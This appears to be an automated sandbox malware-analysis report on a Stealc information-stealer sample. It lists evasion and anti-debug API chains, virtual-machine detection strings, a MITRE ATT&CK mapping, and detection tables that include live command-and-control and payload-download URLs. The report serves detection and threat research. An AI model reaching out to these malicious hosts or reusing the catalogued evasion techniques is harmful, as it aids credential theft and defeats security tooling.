Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_3-25617

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-29025

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Evaded block: after key decision

graph_0-29689

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-29158

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API coverage: 9.0 %

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00430E37 FindFirstFileExW,	0_2_00430E37
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F3C17 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_007F3C17
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EE4D7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_007EE4D7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007E1977
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EEDC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_007EEDC7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F4657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007F4657
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F3627 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	3_2_007F3627
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F42B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_007F42B7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EDEB7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007EDEB7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EF757 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007EF757
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EDB27 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_007EDB27
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EBF17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_007EBF17

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Code function: 3_2_00401160 GetSystemInfo,ExitProcess,

3_2_00401160

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: 169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000734000.00000004.00000020.00020000.00000000.sdmp, 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 169F.tmp.exe, 00000003.00000002.1459972302.00000000008C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: 4h1Zc12ZBe.exe, 00000000.00000002.2480794117.0000000000719000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 169F.tmp.exe, 00000003.00000002.1459877120.000000000083E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	API call chain: ExitProcess graph end node	graph_0-29027
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25605
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-27052
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25602
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25623
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25616
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25624
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25645
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25444
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	API call chain: ExitProcess graph end node	graph_3-25489

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_004231FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004231FF

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000

3_2_00404610

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00416E6B LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00416E6B

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00427F60 mov eax, dword ptr fs:[00000030h]	0_2_00427F60
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h]	3_2_00419160
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E092B mov eax, dword ptr fs:[00000030h]	3_2_007E092B
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E0D90 mov eax, dword ptr fs:[00000030h]	3_2_007E0D90
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F93C7 mov eax, dword ptr fs:[00000030h]	3_2_007F93C7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_008579BA push dword ptr fs:[00000030h]	3_2_008579BA

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00434006 GetProcessHeap,

0_2_00434006

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_004231FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004231FF
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00408348 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00408348
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_004086BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004086BB
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_0040884E SetUnhandledExceptionFilter,	0_2_0040884E
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter,	3_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007FA97F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_007FA97F
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007FAF61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_007FAF61
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007FCB40 SetUnhandledExceptionFilter,	3_2_007FCB40

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 169F.tmp.exe PID: 6480, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004190A0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F9307 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_007F9307

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Process created: C:\Users\user\AppData\Local\Temp\169F.tmp.exe "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_0040895B cpuid

0_2_0040895B

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetLocaleInfoW,	0_2_0042D32C
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043344F
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: EnumSystemLocalesW,	0_2_004336C7
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: EnumSystemLocalesW,	0_2_00433712
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: EnumSystemLocalesW,	0_2_004337AD
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043383A
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetLocaleInfoW,	0_2_00433A8A
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00433BB3
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetLocaleInfoW,	0_2_00433CBA
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00433D87
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: EnumSystemLocalesW,	0_2_0042CF39
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00417630
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_007F7897

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_004073FE GetSystemTimeAsFileTime,

0_2_004073FE

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Code function: 3_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004172F0

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Code function: 3_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_004174D0

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_0040E5F7 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,

0_2_0040E5F7

Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 169F.tmp.exe PID: 6480, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 169F.tmp.exe PID: 6480, type: MEMORYSTR

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00419AD9 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,		0_2_00419AD9
Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00418E03 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		0_2_00418E03

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	23 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	2 Clipboard Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	134 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	11 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4h1Zc12ZBe.exe	23%	Virustotal		Browse
4h1Zc12ZBe.exe	42%	ReversingLabs	Win32.Spyware.Stealc

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312380
C:\Users\user\AppData\Local\Temp\169F.tmp.exe	100%	Avira	HEUR/AGEN.1312380
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\169F.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	34%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\169F.tmp.exe	34%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
iplogger.co	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----	100%	Avira URL Cloud	malware
http://62.204.41.151/ScreenUpdateSync.exe	100%	Avira URL Cloud	malware
http://62.204.41.151/edd20096ecef326d.phpRC)L	100%	Avira URL Cloud	malware
http://62.204.41.151w	0%	Avira URL Cloud	safe
http://62.204.41.151/ows	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485h	100%	Avira URL Cloud	malware
https://iplogger.co/L	100%	Avira URL Cloud	malware
http://62.204.41.151/ScreenUpdateSync.exe	21%	Virustotal		Browse
https://iplogger.co/1vM485vector	100%	Avira URL Cloud	malware
http://62.204.41.151/ows	14%	Virustotal		Browse
http://62.204.41.151	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485#	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485vector	3%	Virustotal		Browse
http://62.204.41.151/edd20096ecef326d.phpttv	100%	Avira URL Cloud	malware
http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----	14%	Virustotal		Browse
http://62.204.41.151/edd20096ecef326d.php	100%	Avira URL Cloud	malware
http://62.204.41.151/edd20096ecef326d.phpFC%L	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485	100%	Avira URL Cloud	malware
http://62.204.41.151/0$	100%	Avira URL Cloud	malware
http://62.204.41.151	19%	Virustotal		Browse
http://62.204.41.151L	0%	Avira URL Cloud	safe
http://62.204.41.151/edd20096ecef326d.php	18%	Virustotal		Browse
https://iplogger.co/	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485#	3%	Virustotal		Browse
http://62.204.41.151/	100%	Avira URL Cloud	malware
https://iplogger.co/1vM485	3%	Virustotal		Browse
